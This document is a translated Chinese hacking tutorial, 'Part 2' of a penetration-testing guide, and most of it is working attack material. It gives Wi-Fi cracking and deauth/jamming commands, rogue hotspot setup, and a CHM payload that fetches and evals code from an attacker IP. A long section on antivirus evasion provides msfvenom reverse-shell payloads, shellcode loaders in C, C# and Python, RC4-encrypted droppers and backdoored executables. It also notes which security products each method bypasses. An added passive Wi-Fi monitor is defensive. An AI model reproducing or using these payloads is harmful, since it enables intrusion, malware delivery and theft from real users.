
How do hackers break into websites? The world's first and most detailed Chinese penetration-testing article (Part 2)


This Wind


Proximity attacks

Wi-Fi cracking

wifite

Use the wifite tool on Kali. Load the wireless card and put it into monitor mode:
#airmon-ng check kill
#airmon-ng start wlan1
Install hcxtools v4.2.0 or later and hcxdumptool v4.2.0 or later:
#apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
#git clone https://github.com/ZerBea/hcxtools
#cd hcxtools
#make
#make install
#git clone https://github.com/ZerBea/hcxdumptool
#cd hcxdumptool
#make
#make install
#wifite --dict /root/Desktop/wordlist.txt   load a wordlist

Aircrack-ng

#airmon-ng start wlan0   enable monitor mode
#airodump-ng wlan0mon   view packets
#airodump-ng -c 1 --bssid APmac -w name wlan1mon   save the packets of one AP
#aireplay-ng --deauth 10 -a APmac wlan0mon   deauth attack
#aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon   deauth one client until a handshake is captured
#airmon-ng stop wlan0mon   disable monitor mode
#aircrack-ng -w wordlist.txt name.cap   crack the password with the given wordlist

Rogue (phishing) network

Hostapd

#apt install hostapd dnsmasq
#cd /etc/hostapd
#vim open.conf   create an unencrypted hotspot (hostapd keys are lowercase)
interface=wlan1
ssid=FreeWIFI
driver=nl80211
channel=1
hw_mode=g

#vim /etc/dnsmasq.conf
dhcp-range=10.0.0.1,10.0.0.255,12h
interface=wlan1

#systemctl restart dnsmasq
Lift the restrictions on the wireless card:
#nmcli radio wifi off
#rfkill unblock wlan
#ifconfig wlan1 10.0.0.1/24
#hostapd open.conf
Sniffing:
#sysctl -w net.ipv4.ip_forward=1
#iptables -t nat -A POSTROUTING -o <upstream interface> -j MASQUERADE
#bettercap -iface wlan1
#net.show
#net.sniff on
#driftnet -i wlan1

Hostapd-wpe

#apt install hostapd-wpe
#vim /etc/hostapd-wpe/hostapd-wpe.conf
Configure interface=wlan1
ssid=
channel=
Certificate changes:
#cd /etc/hostapd-wpe/certs/
Files: ca.cnf, server.cnf, client.cnf
Edit countryName, stateOrProvinceName, localityName, ...
#rm -rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
#make clean
#./bootstrap
#make install
Run it to bring up the hotspot:
#hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
When credentials (a challenge/response pair) are captured, crack them with asleap:
#asleap -C <challenge> -R <response> -W <wordlist>

Wireless jamming

Beacon flood

The card must be switched to monitor mode:
#airmon-ng start wlan1
Create a large number of fake hotspots: mdk3 mon0 b
#mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500

Deauth flood

Against an AP:
#airmon-ng start wlan1
#aireplay-ng --deauth 10 -a <AP MAC address> mon0
Against the clients of an AP:
#airmon-ng start wlan1   put the card into monitor mode
#airodump-ng wlan1mon --bssid <target AP MAC>
#aireplay-ng -0 0 -a <AP MAC> -c <client MAC> wlan0mon   start the attack

Mdk3 destruction

Against everything in range:
#mdk3 wlan1mon d
Against one AP:
#airodump-ng wlan1mon
#mdk3 wlan1mon a -a APmac   launch the attack
Blacklist:
#mdk3 wlan1mon d -c <channel> -b /blacklist.txt
#mdk3 wlan1mon b -n test -w -g -c 1 -s 200
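Added example for the defending side of the rogue-network and wireless-jamming sections above (this is not code from the original post or from any tool it names): a passive monitor that parses raw 802.11 management frames, alerts when a burst of deauthentication/disassociation frames spoofing one BSSID arrives within a one-second window, and flags beacons that advertise a known SSID from a BSSID that is not on the allow-list, reporting whether the impostor dropped encryption. It assumes frames without a radiotap header; the frames in sample_capture(), the KNOWN_APS table, the window and the threshold are all constructed for this example.

```python
"""Passive Wi-Fi monitor: deauth-flood and rogue-AP (same SSID, unknown BSSID) detection."""
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT, BEACON, DISASSOC, DEAUTH = 0, 8, 10, 12   # frame type 0 and the management subtypes used


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_frame(frame):
    """Decode the 802.11 MAC header plus the body fields this monitor needs (no radiotap)."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]                                   # frame control: version(2) type(2) subtype(4)
    info = {"type": (fc0 >> 2) & 0x3, "subtype": (fc0 >> 4) & 0xF,
            "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22])}
    body = frame[24:]
    if info["type"] == MGMT and info["subtype"] in (DISASSOC, DEAUTH) and len(body) >= 2:
        info["reason"] = struct.unpack_from("<H", body)[0]
    elif info["type"] == MGMT and info["subtype"] == BEACON and len(body) >= 12:
        # beacon body: timestamp(8) interval(2) capability(2) then tagged parameters
        info["privacy"] = bool(struct.unpack_from("<H", body, 10)[0] & 0x0010)
        pos = 12
        while pos + 2 <= len(body):
            tag, length = body[pos], body[pos + 1]
            if tag == 0:                             # SSID element
                info["ssid"] = body[pos + 2:pos + 2 + length].decode("utf-8", "replace")
                break
            pos += 2 + length
    return info


def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Construct a minimal management frame (constructed test data; fixed duration/seq)."""
    return (bytes([subtype << 4, 0]) + b"\x3a\x01" + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + b"\x00\x00" + body)


def beacon_body(ssid, privacy):
    cap = 0x0001 | (0x0010 if privacy else 0)        # ESS bit, optional privacy bit
    return struct.pack("<QHH", 0, 100, cap) + bytes([0, len(ssid)]) + ssid.encode()


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Alert once per BSSID when >= threshold deauth/disassoc frames fall inside `window` seconds."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, raw in frames:
        p = parse_frame(raw)
        if not p or p["type"] != MGMT or p["subtype"] not in (DISASSOC, DEAUTH):
            continue
        q = recent[p["bssid"]]
        q.append(ts)
        while ts - q[0] > window:                    # slide the window; q is never empty here
            q.popleft()
        if len(q) >= threshold and p["bssid"] not in alerted:
            alerted.add(p["bssid"])
            alerts.append({"bssid": p["bssid"], "count": len(q), "reason": p.get("reason"),
                           "broadcast": p["dst"] == BROADCAST})
    return alerts


def detect_rogue_ap(frames, known_aps):
    """known_aps: {ssid: {bssid, ...}}. Flag beacons carrying a known SSID from an unlisted BSSID."""
    seen, alerts = set(), []
    for _, raw in frames:
        p = parse_frame(raw)
        if not p or p.get("ssid") is None or p["ssid"] not in known_aps:
            continue
        if p["bssid"] not in known_aps[p["ssid"]] and p["bssid"] not in seen:
            seen.add(p["bssid"])
            alerts.append({"ssid": p["ssid"], "bssid": p["bssid"], "open": not p["privacy"]})
    return alerts


KNOWN_APS = {"CorpWiFi": {"c8:3a:35:30:3e:c8"}}     # constructed allow-list


def sample_capture():
    """Constructed capture: a legitimate AP beaconing, a 12-frame broadcast deauth burst
    spoofing that AP's BSSID, an open impostor beaconing the same SSID, one lone deauth."""
    ap, client, rogue = "c8:3a:35:30:3e:c8", "b8:e8:56:09:cc:9c", "02:11:22:33:44:55"
    frames = [(i * 0.1, build_mgmt(BEACON, BROADCAST, ap, ap, beacon_body("CorpWiFi", True)))
              for i in range(3)]
    frames += [(1.0 + i * 0.02, build_mgmt(DEAUTH, BROADCAST, ap, ap, struct.pack("<H", 7)))
               for i in range(12)]
    frames.append((2.0, build_mgmt(BEACON, BROADCAST, rogue, rogue, beacon_body("CorpWiFi", False))))
    frames.append((2.5, build_mgmt(DEAUTH, client, ap, ap, struct.pack("<H", 3))))
    return frames


if __name__ == "__main__":
    cap = sample_capture()
    for alert in detect_deauth_flood(cap) + detect_rogue_ap(cap, KNOWN_APS):
        print(alert)
```

A single deauth to one client (the last frame in the sample) never reaches the threshold, so only the burst is reported; a WIDS would feed the same two functions from a monitor-mode capture and tune the window and threshold to the site's normal roaming rate.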

Wi-Fi chip: ESP8266

Mdk4

#mdk4 wlan0mon d

CVE-2018-4407

Scapy
send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
Apple iOS 11 and earlier: all devices (and some devices upgraded to iOS 12)
Apple macOS High Sierra (highest affected version 10.13.6): all devices (fixed in Security Update 2018-001)
Apple macOS Sierra (highest affected version 10.12.6): all devices (fixed in Security Update 2018-005)
Apple OS X El Capitan and earlier: all devices

Bypassing MAC address authentication

Ifconfig
#ifconfig wlan1 down
#ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
#ifconfig wlan1 up
Macchanger
#macchanger -m xx:xx:xx:xx:xx:xx wlan1
#macchanger -r wlan1

BadUSB

Card cloning

Bluetooth

Spear-phishing

Phishing email

Spoofed internal domain
Spoofed external domain
Look-alike domain
Compromised account
Mass sending / targeted sending
Fabricated scenario / malicious link / malicious file

CVE

CVE-2017-11882
Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016
CVE-2017-0199
Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
CVE-2012-0158
Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4 and 2008 SP2, SP3 and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2 and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0
CVE-2017-0143
Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511 and 1607; and Windows Server 2016
Office documents / PDF files

Executable files

Forged document files

Extension / icon

Bundling

0day

CHM

Load malicious code from a compiled HTML file.
Compile the HTML with EasyCHM, inserting the malicious code into the HTML file.
Generate a PowerShell-format payload with MSF's web_delivery module.
Use rundll32 together with MyJSRat to run it without a popup window.

Base64-encode the command to avoid special characters.

The command after encoding:
>powershell -ep bypass -enc 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
Run the PowerShell callback command through JSRat:
https://github.com/Ridter/MyJSRat
>python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc 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"

Visit http://ip/wtf, copy the exploit statement into the html file, then compile it:

<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>

Opening the CHM file normally produces a session with no popup window.

Phishing links

URL redirects

Combined with a malicious document or program

Short URLs

Combined with a watering-hole attack

Look-alike domains

Domain hijacking

Spear-phishing through third-party services

Build a relationship through social apps (boyfriend/girlfriend, master/apprentice, HR, business enquiries, etc.) and then phish.

AV evasion

MSF evasion

nps_payload

>python nps_payload.py   generate normally
>msfconsole -r msbuild_nps.rc   start the listener
>%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
If the msbuild process exits normally the session is lost, so save the following as a .bat and run that instead.
Migrate the process immediately after obtaining a session.
@echo off
echo [*] Please Wait, preparing software ..
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml
exit

Encoders

>set EnableStageEncoding true
>set stageencoder x86/fnstenv_mov   encode the stage for evasion
>set stageencodingfallback false
and
>msfvenom --list encoders   list the available encoders

C/C++ source evasion

>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c
-i 20 encodes 20 times
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe

Pointer execution

unsigned char buf[] =
"shellcode";
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // keep the console program from opening a black window
int main(void)
{
	((void(*)(void))&buf)();
	return 0;
}
Build it with VC6.0 and run it on the target.

Currently does not get past Huorong; 360 static and dynamic scans are bypassed.

Allocating dynamic memory

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // keep the console program from opening a black window
unsigned char buf[] =
"shellcode";
int main(void)
{
	char *Memory;
	Memory = (char *)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, buf, sizeof(buf));
	((void(*)())Memory)();
	return 0;
}

Inline assembly

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
int main(void)
{
	__asm
	{
		mov eax, offset shellcode
		jmp eax
	}
	return 0;
}

Forced type cast

#include <windows.h>
#include <stdio.h>
unsigned char buf[] ="";
int main(void)
{
	((void(WINAPI*)(void))&buf)();
	return 0;
}

Assembly junk instructions

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] ="";
int main(void)
{
	__asm
	{
		mov eax, offset shellcode
		_emit 0xFF   // FF E0 is the encoding of jmp eax, emitted as raw bytes
		_emit 0xE0
	}
	return 0;
}

XOR encryption

Install https://github.com/Arno0x/ShellcodeWrapper
Generate a raw-format trojan:
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw

Encrypt:
> python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor
Compile the generated .py with py2exe and run it.
Compile the generated .cs with csc.exe and run it.
Compile the generated .cpp with VC6.0 (with precompiled headers disabled) and run it.

Remote thread injection

Currently gets past Huorong but not 360; it can be combined with other techniques.
Create a new C++ console project in VS.
Right-click > Properties > set "Use of MFC" to "Use MFC in a Static Library".
Generate C-format shellcode and paste it into remote inject.cpp.

Build the project.
It calls back successfully and starts a calc process.

Loader-based evasion

shellcode_launcher
https://github.com/clinicallyinane/shellcode_launcher/
Generate the payload (raw):
>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
Load it with the launcher:
>shellcode_launcher.exe -i shellcode.raw
SSI loader
https://github.com/DimopoulosElias/SimpleShellcodeInjector
Generate the payload (c):
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
Run (strips the C syntax, leaving a plain hex string):
>cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

Start the MSF listener.
The injector can be compiled with MinGW:
>gcc SimpleShellcodeInjector.c -o xxx.exe
Run:
>xxx.exe <hex string produced above>

C# source evasion

Compile directly

Generate the payload.
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Start the MSF listener.
Paste the payload into the marked position:
using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
	class Program
	{
		static void Main(string[] args)
		{
			byte[] shellcode = new byte[] {payload here};
			UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
			Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
			IntPtr hThread = IntPtr.Zero;
			UInt32 threadId = 0;
			// prepare data
			IntPtr pinfo = IntPtr.Zero;
			// execute native code
			hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
		private static UInt32 MEM_COMMIT = 0x1000;
		private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
		[DllImport("kernel32")]
		private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
		UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
		[DllImport("kernel32")]
		private static extern bool VirtualFree(IntPtr lpAddress,
		UInt32 dwSize, UInt32 dwFreeType);
		[DllImport("kernel32")]
		private static extern IntPtr CreateThread(
			UInt32 lpThreadAttributes,
			UInt32 dwStackSize,
			UInt32 lpStartAddress,
			IntPtr param,
			UInt32 dwCreationFlags,
			ref UInt32 lpThreadId
		);
		[DllImport("kernel32")]
		private static extern bool CloseHandle(IntPtr handle);
		[DllImport("kernel32")]
		private static extern UInt32 WaitForSingleObject(
			IntPtr hHandle,
			UInt32 dwMilliseconds
		);
		[DllImport("kernel32")]
		private static extern IntPtr GetModuleHandle(
			string moduleName
		);
		[DllImport("kernel32")]
		private static extern UInt32 GetProcAddress(
			IntPtr hModule,
			string procName
		);
		[DllImport("kernel32")]
		private static extern UInt32 LoadLibrary(
			string lpFileName
		);
		[DllImport("kernel32")]
		private static extern UInt32 GetLastError();
	}
}
Create a C# .NET Framework console project in Visual Studio and compile it; the result gets past the AV.

Encryption

Generate the payload.
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Paste the payload in, then compile and run the encryptor:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace Payload_Encrypt_Maker
{
	class Program
	{
		// Encryption key; it can be changed, as long as KEY is identical in the encrypt and decrypt sources
		static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
		static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
		static byte[] payload = { payload here };    // replace with the shellcode generated by MSF
		private static class Encryption_Class
		{
			public static string Encrypt(string key, string data)
			{
				Encoding unicode = Encoding.Unicode;
				return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
			}
			public static byte[] Encrypt(byte[] key, byte[] data)
			{
				return EncryptOutput(key, data).ToArray();
			}
			// RC4 key-scheduling algorithm (KSA)
			private static byte[] EncryptInitalize(byte[] key)
			{
				byte[] s = Enumerable.Range(0, 256)
				.Select(i => (byte)i)
				.ToArray();
				for (int i = 0, j = 0; i < 256; i++)
				{
					j = (j + key[i % key.Length] + s[i]) & 255;
					Swap(s, i, j);
				}
				return s;
			}
			// RC4 keystream generation (PRGA), XORed with the data
			private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
			{
				byte[] s = EncryptInitalize(key);
				int i = 0;
				int j = 0;
				return data.Select((b) =>
				{
					i = (i + 1) & 255;
					j = (j + s[i]) & 255;
					Swap(s, i, j);
					return (byte)(b ^ s[(s[i] + s[j]) & 255]);
				});
			}
			private static void Swap(byte[] s, int i, int j)
			{
				byte c = s[i];
				s[i] = s[j];
				s[j] = c;
			}
		}
		static void Main(string[] args)
		{
			byte[] result = Encryption_Class.Encrypt(KEY, payload);
			// Print the encrypted bytes as a comma-separated list without a trailing comma,
			// which is the format the decryptor's Split(',') expects
			for (int i = 0; i < result.Length; i++)
			{
				Console.Write(result[i].ToString());
				if (i != result.Length - 1) { Console.Write(","); }
			}
		}
	}
}

Compile the decryptor:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.Threading;
using System.Reflection;
using System.Runtime.CompilerServices;

namespace NativePayload_Reverse_tcp
{
	public class Program
	{
		public static void Main()
		{
			Shellcode.Exec();
		}
	}
	class Shellcode
	{
		public static void Exec()
		{
			string Payload_Encrypted;
			Payload_Encrypted = "payload here";
			string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
			byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
			for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
			{
				byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i]);
				_X_to_Bytes[i] = current;
			}
			// Decryption key; it can be changed, as long as KEY is identical in the encrypt and decrypt sources
			byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
			byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
			// Load the shellcode
			IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
			Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
			CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
			Thread.Sleep(2000);
		}
		// RC4 is symmetric, so decryption is the same keystream XOR as encryption
		public static byte[] Decrypt(byte[] key, byte[] data)
		{
			return EncryptOutput(key, data).ToArray();
		}
		// RC4 key-scheduling algorithm (KSA)
		private static byte[] EncryptInitalize(byte[] key)
		{
			byte[] s = Enumerable.Range(0, 256)
				.Select(i => (byte)i)
				.ToArray();
			for (int i = 0, j = 0; i < 256; i++)
			{
				j = (j + key[i % key.Length] + s[i]) & 255;
				Swap(s, i, j);
			}
			return s;
		}
		// RC4 keystream generation (PRGA), XORed with the data
		private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
		{
			byte[] s = EncryptInitalize(key);
			int i = 0;
			int j = 0;
			return data.Select((b) =>
			{
				i = (i + 1) & 255;
				j = (j + s[i]) & 255;
				Swap(s, i, j);
				return (byte)(b ^ s[(s[i] + s[j]) & 255]);
			});
		}
		private static void Swap(byte[] s, int i, int j)
		{
			byte c = s[i];
			s[i] = s[j];
			s[j] = c;
		}
		[DllImport("kernel32.dll")]
		public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
		[DllImport("kernel32.dll")]
		public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	}
}

XOR/AES encoding

Similar to the XOR encryption above.

CSC + InstallUtil

Generate the payload.
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Paste the payload into InstallUtil-Shellcode.cs and compile it with csc:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs

Run:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe

Python source evasion

pyinstaller: compiling C code

Generate a C-format payload.
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Paste the shellcode into shellcode+c.py. On a 32-bit system install python, py2exe and pyinstaller, go to C:\Python27\Scripts and package the .py into an exe:
>python pyinstaller-script.py -F -w shellcode.py
A dist folder is created in that directory; the exe is inside it.

pyinstaller: compiling Python code (*)

Generate a py-format payload.
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py
Paste the shellcode into shellcode+py.py. On a 32-bit system install python, py2exe and pyinstaller, go to C:\Python27\Scripts and package the .py into an exe:
>python pyinstaller-script.py --console --onefile shellcode.py
A dist folder is created in that directory; the exe is inside it.

Py2exe packaging

Generate a raw-format payload.
The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
Install python and py2exe on a 32-bit system.
Create setup.py in the same directory:

from distutils.core import setup
import py2exe
setup(
    name = "Meter",
    description = "Python-based App",
    version = "1.0",
    console = ["shell.py"],
    options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
    zipfile = None
)
Run the packaging command:
>python setup.py py2exe
A dist folder is created in the current directory; the packaged exe is inside it.

Base64 encoding + Pyinstaller packaging

The MSF listener should auto-migrate the process: set autorunscript migrate -n explorer.exe
>msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Paste the shellcode into shellcode+base64+c.py
>python pyinstaller-script.py -F -w shellcode.py
A dist folder is created in that directory; the exe is inside it.

Separated loaders

hex
Generate a C-format payload:
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
Download k8final.
Paste the shellcode in.
Use:
https://github.com/k8gege/scrun
or
>python scrun.py xxx
or
compile ScRunHex.py into an exe.
Base64 (*)
Generate a C-format payload:
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
Download k8final.
Paste the shellcode in.
After hex-encoding, paste it in and base64-encode it.
Compile the ScRunBase.py matching the system bitness, package it into an exe with pyinstaller, and run it.
https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py

DLL hijacking

White DLL hijacking
Use Process Monitor to find the DLLs a program loads.
Load the DLL with stud_pe
or
generate an evasive payload and paste it in; check which software is on the target, find a hijackable DLL locally, prepare the hijacked file and upload it.

MSBuild

Link:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp
Remote execution:
>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
Auto process migration must be configured.

GreatSCT

>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Mshta

https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta
Generate:
>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin
>cat 1.bin |base64 -w 0

Copy the encoded content into the HTA.

Run:
>mshta http://192.168.0.106:1222/1.hta
360 detects it at execution time, although its static and dynamic scans do not; Huorong does not detect it.

InstallUtil

Covered in the intranet article.

Veil

>use 1   select the Evasion module
>list   list the available payloads
>use 7   select the C-format payload
>set LHOST/LPORT   set the callback IP and port
>generate   generate it

The exe generated directly may be detected; currently it gets past 360 but not Huorong.
Compile the C file with MinGW-w64:
>gcc -o vel.exe veil.c -l ws2_32

RC4

>msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c

Bundling

>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe  -i 15 -f exe -o /var/www/html/payload4.exe

Evasion modules

>show evasion

Phantom-Evasion

Shellter

Only supports 32-bit programs.
>apt install shellter
Specify an exe file.

Choose a payload.

the-backdoor-factory

Check whether the file supports bundling:
>python backdoor.py -f /root/Desktop/putty.exe -S
See which payloads this file supports:
>python backdoor.py -f /root/Desktop/putty.exe -s show
reverse_shell_tcp_inline corresponds to msf
set payload windows/meterpreter/reverse_tcp
meterpreter_reverse_https_threaded corresponds to msf
set payload windows/meterpreter/reverse_https
iat_reverse_tcp_stager_threaded   repairs the IAT
user_supplied_shellcode_threaded   custom payload
Parameters:
-s specify the payload
-H callback address
-P callback port
-J multi-code-cave injection
>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe
The backdoor is written to the backdoored directory.
or
Generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c
Custom shellcode:
>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

zirikatu

hanzoInjection

https://github.com/P0cL4bs/hanzoInjection
Generate:
>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin
>HanzoInjection.exe -p 1.bin -o 1.cs
Compile 1.cs
Properties > Build > Allow unsafe code

PowerShell evasion

Direct generation

>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1
Run:
>powershell -ep bypass -noexit -file 1.ps1
PowerShell behaviour-detection bypass:
